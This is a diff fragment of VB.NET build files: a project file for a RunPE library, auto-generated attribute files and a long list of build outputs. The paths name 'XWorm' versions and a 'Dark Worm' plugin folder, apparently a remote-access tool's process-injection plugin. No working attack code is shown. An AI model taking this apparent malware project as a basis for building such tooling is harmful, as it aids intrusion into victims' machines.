<Compile Include="My Project\AssemblyInfo.vb" />
|
||||
<Compile Include="My Project\Application.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Application.myapp</DependentUpon>
|
||||
<DesignTime>True</DesignTime>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Resources.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DesignTime>True</DesignTime>
|
||||
<DependentUpon>Resources.resx</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Settings.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Settings.settings</DependentUpon>
|
||||
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
||||
</Compile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<EmbeddedResource Include="My Project\Resources.resx">
|
||||
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
|
||||
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
|
||||
<CustomToolNamespace>My.Resources</CustomToolNamespace>
|
||||
<SubType>Designer</SubType>
|
||||
</EmbeddedResource>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="My Project\Application.myapp">
|
||||
<Generator>MyApplicationCodeGenerator</Generator>
|
||||
<LastGenOutput>Application.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="My Project\Settings.settings">
|
||||
<Generator>SettingsSingleFileGenerator</Generator>
|
||||
<CustomToolNamespace>My</CustomToolNamespace>
|
||||
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
|
||||
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
||||
Other similar extension points exist, see Microsoft.Common.targets.
|
||||
<Target Name="BeforeBuild">
|
||||
</Target>
|
||||
<Target Name="AfterBuild">
|
||||
</Target>
|
||||
-->
|
||||
</Project>
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||
dacf2fcdb7a7ea1a2786e9ec503756b1ebbe0fc1a7bb18916a0ccd75a79c8cb6
|
||||
@@ -0,0 +1,265 @@
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\bin\Debug\RunPE.dll
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\bin\Debug\RunPE.pdb
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\bin\Debug\RunPE.xml
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.vbprojResolveAssemblyReference.cache
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.Cache
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.dll
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.xml
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\RunPE\RunPE\obj\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\bin\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\bin\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\bin\Debug\RunPE.xml
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\bin\Debug\System.Net.Http.dll
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\bin\Debug\System.Net.Http.xml
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.Cache
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\obj\Debug\RunPE.xml
|
||||
C:\Users\LapTop\Desktop\PE SRC\RunPE\obj\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\bin\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\bin\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\bin\Debug\RunPE.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\bin\Debug\System.Net.Http.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\bin\Debug\System.Net.Http.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.vbprojResolveAssemblyReference.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.Cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.0\XWorm V2.0\XWorm V2.0\P\PE SRC\RunPE\obj\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\bin\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\bin\Debug\RunPE.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\bin\Debug\RunPE.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\bin\Debug\System.Net.Http.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\bin\Debug\System.Net.Http.xml
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.Cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V2.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
